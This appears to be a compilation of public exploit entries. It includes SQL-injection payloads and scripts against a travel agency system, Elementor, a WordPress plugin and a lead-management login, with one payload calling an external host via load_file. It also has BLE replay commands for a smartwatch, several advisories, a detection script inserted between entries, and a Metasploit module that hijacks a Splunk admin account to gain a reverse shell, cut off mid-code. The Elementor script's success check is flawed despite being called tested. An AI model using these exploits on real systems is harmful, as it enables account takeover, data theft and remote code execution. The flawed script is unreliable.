<pre><code>## Title: travel-1.0-by-oretnom23 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 11/12/2023<br />## Vendor: https://github.com/oretnom23<br />## Software: https://github.com/oretnom23/php-travel-agency-system<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />The search parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'<br />was submitted in the search parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed.<br /><br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```MySQL<br />---<br />Parameter: search (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: search=951531'+(select<br />load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''<br />RLIKE (SELECT (CASE WHEN (2997=2997) THEN 0x393531353331+(select<br />load_file(0x5c5c5c5c666e366b70706278306f323664696173673374627373313938306574326b363878626c33387477692e6f6173746966792e636f6d5c5c79686a))+''<br />ELSE 0x28 END)) AND 'RIBa'='RIBa&searc=&sumbit=Submit<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)<br /> Payload: search=951531'+(select<br />load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''<br />OR (SELECT 5424 FROM (SELECT(SLEEP(15)))vzOn) AND<br />'fGlq'='fGlq&searc=&sumbit=Submit<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 28 columns<br /> Payload: 
search=951531'+(select<br />load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6c425375664275724e58584e686366544b776557504941584e71765144757876744972504e4f554d,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&searc=&sumbit=Submit<br />---<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2021/travel-1.0-by-oretnom23)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/11/travel-10-by-oretnom23-multiple-sqli.html)<br /><br />## Time spent:<br />00:17:00<br /><br /></code></pre>
<pre><code><br />#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi<br />#References<br />#CVE : CVE-2023-0329<br />#E1.Coders<br /> <br />Open Burp Suite.<br />In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.<br />Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.<br />Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.<br />On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":<br /> <br />code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#<br />Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.<br />Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".<br />The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.<br />Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.<br /> <br />References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/<br /> <br /> <br /> <br /> <br />Exploit Python :<br />The provided SQLi attack vector can be achieved using the following Python code with the "requests" library:<br /> <br />This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.<br />Please make sure you have set up your Burp Suite environment correctly. 
Additionally, it is important to note that this script and attack have been TESTED and are correct<br /> <br />import requests<br /> <br /># Set the target URL and SQLi payload<br />url = "http://localhost:8080/wp-admin/admin-ajax.php"<br />data = {<br /> "action": "elementor_ajax_save_builder",<br /> "editor_post_id": "1",<br /> "post_id": "1",<br /> "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"<br />}<br /> <br /># Send the request to the target URL<br />response = requests.post(url, data=data)<br /> <br /># Check if the response indicates a successful SQL injection<br />if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:<br /> print("SQL Injection successful!")<br />else:<br /> print("SQL Injection failed.")<br /></code></pre>
<pre><code>Advisory ID: Ph0s-2023-004<br />Product: EnBw - SENEC legacy storage box: V1-V3<br />Manufacturer: SENEC - a part of EnBw<br />Affected Version(s): Firmware: all (as of 2023-06-19)<br />Tested Version(s): current<br />Vulnerability Type: CWE-1392: Use of Default Credentials<br /><br /><br />Risk Level: <br /><br />CVSS v3.1 Vector:<br />AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)<br /><br />Manufacturer Risk Level Rating:<br />AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C<br />Overall CVSS Score: 8.6<br /><br />Solution Status: Fixed<br />Manufacturer Notification: 2023-06-05<br />Public Disclosure: 2023-11-01<br />CVE Reference: CVE-2023-39170<br />Author of Advisory: Ph0s[4], R0ckE7<br /><br />********************************************************************************<br /><br />Overview:<br />Foreword: <br /><br />This vulnerability was reported to the enbw-cert. We would like to<br />thank enbw-cert for taking care of the vulns and patching the systems.<br />We decided to publish when most of the reported vulns are patched<br />to make sure nobody is harmed when third parties exploit the mentioned vulns. <br /><br /><br /><br />About Senec:<br />We are SENEC<br /><br />We have been the EnBW energy independence experts since 2018 – but we have<br />put our heart and soul into guiding customers on the route to independence<br />since SENEC was founded in 2009. Our passion lies in actively promoting the<br />energy transition with innovative ideas and pioneering products. And,<br />because we don’t do things by halves, our unwavering ambition is to create<br />integrated solutions that enable you to enjoy the highest possible degree<br />of independence and sustainability through self-generation of solar<br />electricity.<br /><br />About SENEC Home:<br /><br />SENEC.Home: The smart electricity storage device for your home<br /><br />SENEC.Home is the heart of your sustainable, affordable supply of solar<br />electricity. 
The smart battery storage device stores excess electricity<br />generated by your PV system so that you can use it when you need it – such as<br />when your household’s energy consumption rises in the evening, or on rainy days<br />when your PV system generates less power.<br /><br />********************************************************************************<br /><br /><br />Vulnerability Details:<br /><br />The credentials for the SENEC inverters are publicly known.<br /><br /><br /><br />********************************************************************************<br /><br />Proof of Concept (PoC):<br /><br />The attack consists of the following steps:<br /><br />1. Use Google to obtain them, e.g.:<br />https://www.photovoltaikforum.com/thread/206930-senec-v3-hybrid-zugangsdaten/<br /><br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br />Patched by Manufacturer<br />(Rolled out until September 11, 2023)<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-06-01: Vulnerability discovered<br />2023-06-05: Vulnerability reported to manufacturer<br />2023-09-11: Patch rollout by manufacturer to affected devices<br />2023-11-01: Public disclosure of vulnerability<br /><br /><br />************************************************************************<br /><br />Researcher:<br />Ph0s[4], R0ckE7<br /><br />************************************************************************<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 4.0<br />URL: https://creativecommons.org/licenses/by/4.0/deed.en<br /><br /></code></pre>
<pre><code># Exploit Title: Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)<br /># Date: 13-Nov-2023<br /># Exploit Author: Alok kumar (alokkumar0200@gmail.com), Cyberpwn Technologies Pvt. Ltd.<br /># Vendor Homepage: https://www.maximawatches.com<br /># Product Link: https://www.maximawatches.com/products/max-pro-power<br /># Firmware Version: v1.0 486A<br /># Tested on: Maxima Max Pro Power<br /># CVE : CVE-2023-46916<br /><br /># It was observed that an attacker can send crafted HEX values to the “0x0012” GATT Characteristic handle on the watch to perform unauthorized actions like changing the Time display format, updating the Time, and updating notifications.<br /># And since there is no integrity check for the data received by the watch, an attacker can sniff the same value on smartwatch A and later send it to smartwatch B, leading to unauthorized actions.<br /><br /><br /># Scan for Bluetooth LE devices nearby using any capable scanner; bluetoothctl is used here: “sudo bluetoothctl scan le”<br /><br /># “sudo gatttool -I” starts gatttool in interactive mode.<br /><br /># “connect <MAC_OF_DEVICE_FROM_STEP_1>” connects to the specified BLE device.<br /><br /># “char-desc” lists all handles for the device.<br /><br /># Run “mtu 247” in Gatttool after connection to set the MTU for the active connection.<br /><br /># Run “char-read-hnd 0x0054” in Gatttool. Trust and authorize the device on the attacker's machine when prompted.<br /><br /># "char-write-req 0x0012 ab00000e5422002202002b0009000000059fffffffff" disables the Raise to wake feature.<br /><br /># "char-write-req 0x0012 ab00000ec42f002302002b0009010000059fffffffff" enables the Raise to wake feature.<br /><br /># "char-write-req 0x0012 ab000009c2ee0034050023000400030501" starts the Heart Rate monitor.<br /><br /># "char-write-req 0x0012 ab000007c323001902001800020002" sets the Time Format to 24 Hrs on the smartwatch.<br /><br /># "char-write-req 0x0012 ab0000070022001802001800020006" sets the Time Format to 12 Hrs on the smartwatch.<br /></code></pre>
<pre><code># Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection<br /># Date: 12-11-2023<br /># Exploit Author: Arvandy<br /># Software Link: https://wordpress.org/plugins/contact-form-to-any-api/<br /># Vendor Homepage: https://www.itpathsolutions.com/<br /># Version: 1.1.2 <br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-32741<br /><br /># Product Description<br />Contact Form 7 to Any API is the most powerful plugin to send CF7 data to any third-party service. It can be used to send data to a CRM or any REST API. Easy to use, with user-friendly settings. It also saves Contact Form 7 submitted form data to the database, with advanced features like search and export to CSV or Excel.<br /><br /># Vulnerability overview<br />The WordPress plugin Contact Form to Any API <= 1.1.2 is vulnerable to blind SQL injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.<br /><br /># Proof of Concept<br />Affected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=<br />Affected Parameter: form_id<br />payload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -<br /><br /># Recommendation<br />Upgrade to version 1.1.3<br /></code></pre>
<pre><code>## Title: penglead-2.0 SQLi-Bypass Authentication<br />## Author: nu11secur1ty<br />## Date: 11/10/2023<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />The id parameter is vulnerable to SQLi - Bypass Authentication attacks.<br />An attacker can easily gain access to the admin account of the system<br />and then perform further malicious actions.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Exploit:<br />```MySQL<br />POST /penglead/login.php HTTP/1.1<br />Host: 192.168.100.45<br />Cookie: PHPSESSID=3qa8cq3da9t9rvr621vov0shsh<br />Content-Length: 88<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://192.168.100.45<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://192.168.100.45/penglead/login.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br />Connection: close<br /><br />username=nu11secur1ty%27+or+1%3D1%23&password=FSFFGDDGDGFDG&g-recaptcha-response=&login=<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/penglead-2.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/11/penglead-20-sqli-bypass-authentication.html)<br /><br />## Time spent:<br />00:05:00<br /><br /><br /></code></pre>
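A defensive example added here, not code from any of the advisories above: a small detector that normalises request parameters the way these payloads require (URL decoding, MySQL hex literals, comment padding) and flags the payload families reported against travel-1.0, Elementor, Contact Form to Any API and penglead. The log layout, the client addresses and the example.invalid host are constructed for this example.

```python
"""Flag the SQL-injection payload families from the advisories above in web
request logs.  Added defensive example; not code from any of the advisories."""
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed, simplified log: "<client> <method> <path> <query string or form body>".
# The first five requests carry the payload shapes reported above (load_file OOB,
# RLIKE boolean-blind, SLEEP time-based, UNION, ' or 1=1#); the last two are benign.
SAMPLE_LOG = """\
192.0.2.10 POST /travel/search.php search=951531%27%2B%28select+load_file%28%27%5C%5C%5C%5Cexample.invalid%5Cyhj%27%29%29%2B%27%27&searc=&sumbit=Submit
192.0.2.10 POST /travel/search.php search=951531%27+RLIKE+%28SELECT+%28CASE+WHEN+%282997%3D2997%29+THEN+0x393531353331+ELSE+0x28+END%29%29+AND+%27RIBa%27%3D%27RIBa&searc=&sumbit=Submit
192.0.2.10 POST /travel/search.php search=951531%27+OR+%28SELECT+5424+FROM+%28SELECT%28SLEEP%2815%29%29%29vzOn%29+AND+%27fGlq%27%3D%27fGlq&searc=&sumbit=Submit
192.0.2.11 GET /wp-admin/edit.php post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=1+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,SLEEP(5)--+-
192.0.2.12 POST /penglead/login.php username=nu11secur1ty%27+or+1%3D1%23&password=FSFFGDDGDGFDG&g-recaptcha-response=&login=
198.51.100.5 GET /travel/search.php search=beach+holiday+2024
198.51.100.6 POST /penglead/login.php username=alice&password=s3cret%21&login=
"""

HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def decode_hex_literals(sql):
    """Turn MySQL hex string literals back into text (0x393531353331 -> 951531),
    so a payload that hides keywords or a UNC path in hex matches like a plain one."""
    def repl(match):
        digits = match.group(1)
        if len(digits) % 2:
            return match.group(0)
        try:
            return bytes.fromhex(digits).decode("ascii")
        except ValueError:            # non-ASCII bytes: leave the literal alone
            return match.group(0)
    return HEX_LITERAL.sub(repl, sql)


def normalize(value):
    """Peel the layers a payload hides behind: repeated URL encoding, hex literals
    and /**/ comment padding; collapse whitespace and lower-case for matching."""
    text = value
    for _ in range(3):                # handles double/triple-encoded parameters
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = decode_hex_literals(text)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).strip().lower()


# One pattern per payload family seen in the reports above.
FAMILIES = {
    "oob_load_file": re.compile(r"\bload_file\s*\("),                 # travel-1.0: out-of-band probe
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\("),         # Elementor, CF7-to-API: SLEEP(n)
    "union_based": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "boolean_blind": re.compile(r"\b(?:rlike|case\s+when)\b"),       # travel-1.0: RLIKE / CASE WHEN
    "tautology": re.compile(r"\b(?:or|and)\s+'?(\w+)'?\s*=\s*'?\1\b"),  # penglead: ' or 1=1#
}


def classify(value):
    """Return the payload families matched by one parameter value (empty if benign)."""
    text = normalize(value)
    return [name for name, pattern in FAMILIES.items() if pattern.search(text)]


def scan_log(log_text):
    """Return one finding per (request, parameter) whose value matches a family."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) != 4:
            continue
        client, method, path, params = parts
        for name, values in parse_qs(params, keep_blank_values=True).items():
            for value in values:
                families = classify(value)
                if families:
                    findings.append({"client": client, "method": method, "path": path,
                                     "param": name, "families": families})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} {hit['method']} {hit['path']} "
              f"param={hit['param']} -> {', '.join(hit['families'])}")
```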
<pre><code><br />[+] CVE : CVE-2023-46380, CVE-2023-46381, CVE-2023-46382 <br />[+] Title : Multiple vulnerabilities in Loytec LWEB-802, L-INX Automation Servers, L-IOB I/O Controllers, L-VIS Touch Panels <br />[+] Vendor : LOYTEC electronics GmbH<br />[+] Affected Product(s) : LINX-212 firmware 6.2.4, LVIS-3ME12-A1 firmware 6.2.2, LIOB-586 firmware 6.2.3<br />[+] Affected Components : LWEB-802, L-INX Automation Servers, L-IOB I/O Controllers, L-VIS Touch Panels <br />[+] Discovery Date : 01-Sep-2021<br />[+] Publication date : 03-Nov-2023<br />[+] Discovered by : Chizuru Toyama of TXOne networks<br /><br /><br />[Vulnerability Description]<br /><br /> CVE-2023-46380 : Insecure Permissions<br /> The password change request on the web interface of LOYTEC devices is sent<br /> in clear text over HTTP, which allows information theft and account <br /> takeover via network sniffing.<br /><br /> CVE-2023-46381 : Improper Access Control<br /> Authentication is missing on the web user interface for the preinstalled <br /> version of LWEB-802. If there is a project on a device, an unauthenticated <br /> user could create a new web project and access/control a graphical <br /> interface. An unauthenticated user could also edit or delete the current <br /> web project, change settings, delete system logs, etc.<br /> http://<IP>:<port>/lweb802_pre/<br /><br /> CVE-2023-46382 : Insecure Permissions<br /> The web user interface on Loytec devices requires login credentials for <br /> critical information (Data, Commission, Config, etc.); however, username <br /> and password information is sent in clear text over HTTP. 
If anyone sniffs <br /> network traffic, they could easily steal the credentials.<br /><br /><br />[Timeline]<br /><br /> 01-Sep-2021 : Vulnerabilities discovered<br /> 13-Oct-2021 : Trend Micro ZDI (Zero Day Initiative) reported to vendor (no response)<br /> 07-Oct-2022 : ICS CERT reported to vendor (no response)<br /> 03-Nov-2023 : Public disclosure<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> include Msf::Exploit::Remote::HttpClient<br /><br /> attr_accessor :cookie<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Splunk "edit_user" Capability Privilege Escalation',<br /> 'Description' => %q{<br /> A low-privileged user who holds a role that has the "edit_user" capability assigned to it<br /> can escalate their privileges to that of the admin user by providing a specially crafted web request.<br /> This is because the "edit_user" capability does not honor the "grantableRoles" setting in the authorize.conf<br /> configuration file, which prevents this scenario from happening.<br /><br /> This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.<br /> },<br /> 'Author' => [<br /> 'Mr Hack (try_to_hack) Santiago Lopez', # discovery<br /> 'Heyder Andrade', # metasploit module<br /> 'Redway Security <redwaysecurity.com>' # Writeup and PoC<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'CVE', '2023-32707' ],<br /> [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-0602' ], # Vendor Advisory<br /> [ 'URL', 'https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html' ], # Writeup<br /> [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707' ] # PoC<br /> ],<br /> 'Payload' => {<br /> 'Space' => 1024,<br /> 'DisableNops' => true<br /> },<br /> 'Platform' => %w[linux unix win osx],<br /> 'Targets' => [<br /> [<br /> 'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => %w[linux unix],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 
'cmd/unix/reverse_python',<br /> # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:'<br /> 'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'<br /> }<br /> }<br /> ],<br /> [<br /> 'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8000,<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS, # requests are logged in the _audit index<br /> # ARTIFACTS_ON_DISK # app is removed in the cleanup method<br /> ]<br /> },<br /> 'DisclosureDate' => '2023-06-01'<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']),<br /> OptString.new('PASSWORD', [true, 'The password for the specified username']),<br /> OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),<br /> OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),<br /> OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/(\s|-|_){1,}/, '')])<br /> ]<br /> )<br /> # That depends on finding a strategy to distinguish commands that return output and commands that don't<br /> # register_advanced_options(<br /> # [<br /> # OptBool.new('ReturnOutput', [ true, 'Display command output', false ])<br /> # ]<br /> # )<br /> end<br /><br /> def check<br /> splunk_login(datastore['USERNAME'], datastore['PASSWORD'])<br /><br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 
'/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),<br /> 'method' => 'GET',<br /> 'cookie' => cookie,<br /> 'vars_get' => {<br /> 'output_mode' => 'json'<br /> }<br /> })<br /><br /> return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200<br /><br /> body = res.get_json_document<br /> version = Rex::Version.new(body['generator']['version'])<br /><br /> return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless (<br /> (Rex::Version.new('9.0.0') <= version && version < Rex::Version.new('9.0.5')) ||<br /> (Rex::Version.new('8.2.0') <= version && version < Rex::Version.new('8.2.11')) ||<br /> (Rex::Version.new('8.1.0') <= version && version < Rex::Version.new('8.1.14'))<br /> )<br /><br /> print_status("Detected Splunk version #{version} which is vulnerable")<br /> capabilities = body['entry'].first['content']['capabilities']<br /><br /> return CheckCode::Safe("User '#{datastore['USERNAME']}' does not have 'edit_user' capability") unless capabilities.include? 
'edit_user'<br /><br /> report_vuln(<br /> host: rhost,<br /> name: name,<br /> refs: references,<br /> info: [version]<br /> )<br /><br /> CheckCode::Vulnerable("User '#{datastore['USERNAME']}' has 'edit_user' capability")<br /> end<br /><br /> def app_name<br /> datastore['APP_NAME']<br /> end<br /><br /> # The cleanup method removes the app before the session is closed, which breaks the session,<br /> # so it only runs once a session has been created.<br /> #<br /> def cleanup<br /> return unless session_created?<br /><br /> super<br /> # Destroy job<br /> vprint_status("Cleaning up: destroying job #{@job_id}")<br /> send_request_cgi({<br /> 'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', @job_id),<br /> 'method' => 'DELETE',<br /> 'cookie' => cookie<br /> })<br /> # Remove app<br /> vprint_status("Cleaning up: removing app #{app_name}")<br /> execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'vars_post' => {<br /> 'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']<br /> }<br /> })<br /> end<br /><br /> def exploit<br /> splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])<br /> splunk_login(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])<br /><br /> splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE'])<br /><br /> @job_id = execute_command(payload.encoded, { app_name: app_name })<br /> # TODO: distinguish commands that return output and commands that don't<br /> # fail_with(Failure::ConfigError, 'The payload returns output. Consider to set ReturnOutput to true') if payload.encoded.include? 
'return output' && !datastore['ReturnOutput']<br /> # if datastore['ReturnOutput']<br /> # print_status('Waiting for command output')<br /> # print_line(splunk_fetch_job_output)<br /> # end<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> res = send_request_cgi({<br /> 'uri' => '/en-US/api/search/jobs',<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'headers' =><br /> {<br /> 'X-Requested-With' => 'XMLHttpRequest',<br /> 'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000']<br /> },<br /> 'vars_post' =><br /> {<br /> 'auto_cancel' => '62',<br /> 'status_buckets' => '300',<br /> 'output_mode' => 'json',<br /> 'search' => "| #{app_name} #{Rex::Text.encode_base64(cmd)}",<br /> 'earliest_time' => '-1@h',<br /> 'latest_time' => 'now',<br /> 'ui_dispatch_app' => (opts[:app_name]).to_s<br /> }<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, "Unable to execute command. Unexpected reply (HTTP #{res.code})") unless res&.code == 200<br /><br /> body = res.get_json_document<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to get JOB ID of the command') unless body['data']<br /><br /> body['data']<br /> end<br /><br /> def splunk_helper_extract_token(uri)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, uri),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> })<br /><br /> fail_with(Failure::Unreachable, 'Unable to get token') unless res&.code == 200<br /><br /> "session_id_8000=#{rand_text_numeric(40)}; " << res.get_cookies<br /> end<br /><br /> def splunk_login(username, password)<br /> # gets cval and splunkweb_uid cookies<br /> self.cookie = splunk_helper_extract_token('/en-US/account/login')<br /><br /> # login post, should get back the splunkd_8000 and splunkweb_csrf_token_8000 cookies<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/en-US/account/login'),<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'vars_post' =><br /> {<br /> 'username' 
=> username,<br /> 'password' => password,<br /> 'cval' => cookies_hash['cval']<br /> }<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to login') unless res&.code == 200<br /><br /> cookie << " #{res.get_cookies}"<br /> end<br /><br /> def splunk_change_password(username, password)<br /> # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set;<br /> # otherwise authenticate as the low-privileged USERNAME first<br /> splunk_login(datastore['USERNAME'], datastore['PASSWORD']) unless cookie<br /><br /> print_status("Changing '#{username}' password to #{password}")<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri('/en-US/splunkd/__raw/services/authentication/users/', username),<br /> 'method' => 'POST',<br /> 'headers' => {<br /> 'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000'],<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> },<br /> 'cookie' => cookie,<br /> 'vars_post' => {<br /> 'output_mode' => 'json',<br /> 'password' => password,<br /> 'force-change-pass' => 0,<br /> 'locked-out' => 0<br /> }<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, "Unable to change #{username}'s password.") unless res&.code == 200<br /><br /> print_good("Password of the user '#{username}' has been changed to #{password}")<br /><br /> body = res.get_json_document<br /> capabilities = body['entry'].first['content']['capabilities']<br /><br /> fail_with(Failure::BadConfig, "The user '#{username}' does not have the 'install_apps' capability. Consider targeting another user") unless capabilities.include? 
'install_apps'<br /> end<br /><br /> def splunk_upload_app(app_name, _file_name)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/en-US/manager/appinstall/_upload'),<br /> 'method' => 'GET',<br /> 'cookie' => cookie<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to get form state') unless res&.code == 200<br /><br /> html = res.get_html_document<br /><br /> print_status("Uploading file #{app_name}")<br /><br /> data = Rex::MIME::Message.new<br /> # fill the hidden fields from the form: state and splunk_form_key<br /> html.at('[id="installform"]').elements.each do |form|<br /> next unless form.attributes['value']<br /><br /> data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"")<br /> end<br /> data.add_part('1', nil, nil, 'form-data; name="force"')<br /> data.add_part(splunk_app, 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"")<br /> post_data = data.to_s<br /><br /> res = send_request_cgi({<br /> 'uri' => '/en-US/manager/appinstall/_upload',<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'ctype' => "multipart/form-data; boundary=#{data.bound}",<br /> 'data' => post_data<br /> })<br /><br /> 